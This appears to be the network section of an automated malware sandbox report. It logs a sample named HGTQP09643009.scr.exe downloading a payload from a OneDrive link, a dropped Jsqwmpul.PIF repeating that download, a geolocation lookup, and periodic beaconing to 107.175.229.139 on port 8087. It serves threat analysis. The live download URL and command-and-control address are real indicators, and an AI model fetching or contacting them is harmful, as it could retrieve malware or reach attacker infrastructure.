May 15, 2024 01:56:53.700189114 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.700212955 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.779342890 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870007038 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870121002 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870134115 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870143890 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870157003 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870165110 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870167971 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870179892 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870191097 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870197058 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870208979 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870217085 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870222092 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870234013 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870237112 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870246887 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870258093 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870268106 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870271921 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870285034 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870299101 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870312929 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870368958 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870382071 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870393991 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870404005 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870408058 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870415926 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870434046 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870436907 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870445967 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870456934 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870465040 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870469093 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870479107 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870481014 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870492935 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870502949 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870503902 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870516062 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870527029 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870537043 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870543957 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870548010 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870559931 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870570898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870573997 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870594978 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870605946 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870618105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870629072 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870640039 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870646000 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870651007 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870661974 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870663881 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870678902 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870690107 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870701075 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870714903 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870726109 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870728970 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870738029 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870748997 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870750904 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870770931 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870829105 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870843887 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870862961 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870865107 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870874882 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870886087 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870898962 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870901108 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870909929 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870922089 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870923996 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870934010 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870944977 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870951891 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870956898 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870969057 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.870979071 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.870995045 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871001959 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871014118 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871026039 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871037960 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871041059 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871048927 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871061087 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871063948 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871073008 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871084929 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871090889 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871095896 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871112108 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871119022 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871145010 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871177912 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871191978 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871213913 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871218920 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871227026 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871238947 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871251106 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871253014 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871263027 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871275902 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:53.871279955 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.871304989 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:53.917866945 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:54.365048885 CEST	80	49709	178.237.33.50	192.168.2.5
May 15, 2024 01:56:54.365120888 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:56:56.673568010 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:56.847909927 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:56.849766970 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:56:57.022191048 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:57.030174017 CEST	8087	49708	107.175.229.139	192.168.2.5
May 15, 2024 01:56:57.030349016 CEST	49708	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:57:04.417090893 CEST	49710	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.417149067 CEST	443	49710	13.107.139.11	192.168.2.5
May 15, 2024 01:57:04.417222023 CEST	49710	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.417649984 CEST	49710	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.417695045 CEST	443	49710	13.107.139.11	192.168.2.5
May 15, 2024 01:57:04.417762995 CEST	49710	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.508040905 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.508076906 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:04.508160114 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.662187099 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:04.662224054 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.089240074 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.089420080 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.090812922 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.090826035 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.091044903 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.132792950 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.136435032 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.180119991 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.870840073 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.870943069 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.871001959 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.871196032 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.871210098 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:05.871225119 CEST	49711	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:05.871229887 CEST	443	49711	13.107.139.11	192.168.2.5
May 15, 2024 01:57:12.837265015 CEST	49721	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.837301016 CEST	443	49721	13.107.139.11	192.168.2.5
May 15, 2024 01:57:12.837399960 CEST	49721	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.837491989 CEST	49721	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.837536097 CEST	443	49721	13.107.139.11	192.168.2.5
May 15, 2024 01:57:12.837582111 CEST	49721	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.850301981 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.850333929 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:12.850397110 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.851713896 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:12.851728916 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:13.274394035 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:13.274501085 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:13.279659986 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:13.279671907 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:13.279930115 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:13.326697111 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:13.333154917 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:13.380112886 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:14.127547026 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:14.127648115 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:14.127767086 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:14.128005981 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:14.128029108 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:14.128037930 CEST	49722	443	192.168.2.5	13.107.139.11
May 15, 2024 01:57:14.128043890 CEST	443	49722	13.107.139.11	192.168.2.5
May 15, 2024 01:57:18.262845039 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:57:18.264314890 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:57:18.484375000 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:57:48.582425117 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:57:48.584034920 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:57:48.804744959 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:58:18.882675886 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:58:18.884038925 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:58:19.110558033 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:58:42.661130905 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:58:43.426512003 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:58:44.629630089 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:58:46.926611900 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:58:49.147198915 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:58:49.167994022 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:58:49.382194996 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:58:51.614016056 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:59:00.723380089 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:59:18.926573038 CEST	49709	80	192.168.2.5	178.237.33.50
May 15, 2024 01:59:19.345727921 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:59:19.347415924 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:59:19.574414968 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:59:49.579780102 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 01:59:49.584578991 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 01:59:49.802031994 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 02:00:19.778661966 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 02:00:19.780630112 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 02:00:20.000684977 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 02:00:50.018156052 CEST	8087	49707	107.175.229.139	192.168.2.5
May 15, 2024 02:00:50.023936033 CEST	49707	8087	192.168.2.5	107.175.229.139
May 15, 2024 02:00:50.247400999 CEST	8087	49707	107.175.229.139	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 15, 2024 01:56:47.477361917 CEST	51136	53	192.168.2.5	1.1.1.1
May 15, 2024 01:56:49.340552092 CEST	61577	53	192.168.2.5	1.1.1.1
May 15, 2024 01:56:52.686615944 CEST	57746	53	192.168.2.5	1.1.1.1
May 15, 2024 01:56:52.797141075 CEST	53	57746	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 15, 2024 01:56:47.477361917 CEST	192.168.2.5	1.1.1.1	0x1808	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
May 15, 2024 01:56:49.340552092 CEST	192.168.2.5	1.1.1.1	0x630a	Standard query (0)	2hhi9w.am.files.1drv.com	A (IP address)	IN (0x0001)	false
May 15, 2024 01:56:52.686615944 CEST	192.168.2.5	1.1.1.1	0x2717	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 15, 2024 01:56:47.588795900 CEST	1.1.1.1	192.168.2.5	0x1808	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2024 01:56:47.588795900 CEST	1.1.1.1	192.168.2.5	0x1808	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2024 01:56:47.588795900 CEST	1.1.1.1	192.168.2.5	0x1808	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2024 01:56:47.588795900 CEST	1.1.1.1	192.168.2.5	0x1808	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
May 15, 2024 01:56:47.588795900 CEST	1.1.1.1	192.168.2.5	0x1808	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
May 15, 2024 01:56:49.633586884 CEST	1.1.1.1	192.168.2.5	0x630a	No error (0)	2hhi9w.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2024 01:56:49.633586884 CEST	1.1.1.1	192.168.2.5	0x630a	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2024 01:56:52.797141075 CEST	1.1.1.1	192.168.2.5	0x2717	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	178.237.33.50	80	6352	C:\Windows\SysWOW64\SndVol.exe

Timestamp	Bytes transferred	Direction	Data
May 15, 2024 01:56:53.131319046 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 15, 2024 01:56:53.365603924 CEST	1166	IN	HTTP/1.1 200 OK date: Tue, 14 May 2024 23:56:53 GMT server: Apache content-length: 958 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 34 2e 31 37 2e 34 30 2e 31 30 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 [TRUNCATED] Data Ascii: { "geoplugin_request":"84.17.40.102", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	13.107.139.11	443	5900	C:\Users\user\Desktop\HGTQP09643009.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-14 23:56:48 UTC	213	OUT	GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-05-14 23:56:49 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://2hhi9w.am.files.1drv.com/y4mBwd_O0orCZYCB-m72OLd7ovLPprUM4laUDtpNM9mFpZXV0m08RNxiySgMwrezLWpJ9opJdXpBLPD4g8kCB8JiMk9OxEtTRR2kIVZbBpjfX2AjWqKohwSAcs4spP31bO_6wbHclxYjBI65SmJucHX6rze-IHNZqYsk8p04Qkw_zadYlV3wkmmKUArpPV4h0pOWbS2cHZ3eQ_Rv_q7DGlwfA/255_Jsqwmpulpcm?download&psid=1 Set-Cookie: E=P:YNi5hHF03Ig=:gzB9cs0VwkTmh8V7nNb00uLpUB/oCwGI2O1TkIbyo0g=:F; domain=.live.com; path=/ Set-Cookie: xid=3de28d96-2537-4739-91c0-461ea09af5c2&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:16:48 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:56:49 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: fdffbf76f-f9b28 X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 7D42D3F340974FFAB3706632FEC9A5F8 Ref B: BN3EDGE0506 Ref C: 2024-05-14T23:56:48Z Date: Tue, 14 May 2024 23:56:48 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	13.107.139.11	443	2172	C:\Users\Public\Libraries\Jsqwmpul.PIF

Timestamp	Bytes transferred	Direction	Data
2024-05-14 23:57:05 UTC	213	OUT	GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-05-14 23:57:05 UTC	1177	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://2hhi9w.am.files.1drv.com/y4mPer_JvrxbylmNPC7e_eDC5k1q6183BqTBthJtctBOaRiGjAhjc2kQZzIhZZ1Vh_YjRYQyAtF4xHLCFvvVPSAsxjyL8i1wQvRabl8_pNjxWSb1Jv8_7p1Ai3I3ZtD6RGOa5xk6OFjuhoVC4DS4KP2yeInjRv7r1TxmTbZOs5x72KxUmmK5LteubP8q7-iXV-V_CqR4qJRnN0LL0mK241C_Q/255_Jsqwmpulpcm?download&psid=1 Set-Cookie: E=P:2xSXjnF03Ig=:qxxFerB2KxQwWqhseJBvbAVjVNq05h+bX9OFZ0dvmQM=:F; domain=.live.com; path=/ Set-Cookie: xid=a809cc06-9a40-4d74-ad7b-7a2b8fd9cba2&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:17:05 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:57:05 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 7dfffcfdb8-w4zvz X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 397ACDDA25CE42F6A82E14A5873D98BD Ref B: BN3EDGE0506 Ref C: 2024-05-14T23:57:05Z Date: Tue, 14 May 2024 23:57:05 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49722	13.107.139.11	443	6804	C:\Users\Public\Libraries\Jsqwmpul.PIF

Timestamp	Bytes transferred	Direction	Data
2024-05-14 23:57:13 UTC	213	OUT	GET /download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-05-14 23:57:14 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://2hhi9w.am.files.1drv.com/y4mGwuSSuFxuDDvpAJ_fbrE3BKuKW5XqcUBzuNsRzBm8cRH2dyNR7edm5BhYh2ZPGwCX7_jbh1_b4HWcaJyIPa8XSxZScIlzsPvq8mXbEqv3_NRqmzc5SEYRFJoSRIDrGT_5zChqpa1DfS9BSPUTA_Mn38QqZA4arKsZn5LrHXWfVkxbboXKRBvJdhsN61kO3Jctwqp904djxjoFo5q0yNZkw/255_Jsqwmpulpcm?download&psid=1 Set-Cookie: E=P:fCp6k3F03Ig=:Usm+GFdYWJ5cMKTzwPf7OvJIdpmSTU++lLDGROmLMwY=:F; domain=.live.com; path=/ Set-Cookie: xid=9a7c4c1d-3211-4d02-b6ec-e4494a22b769&&ODSP-ODWEB-ODCF&174; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Tue, 14-May-2024 22:17:13 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Tue, 21-May-2024 23:57:14 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 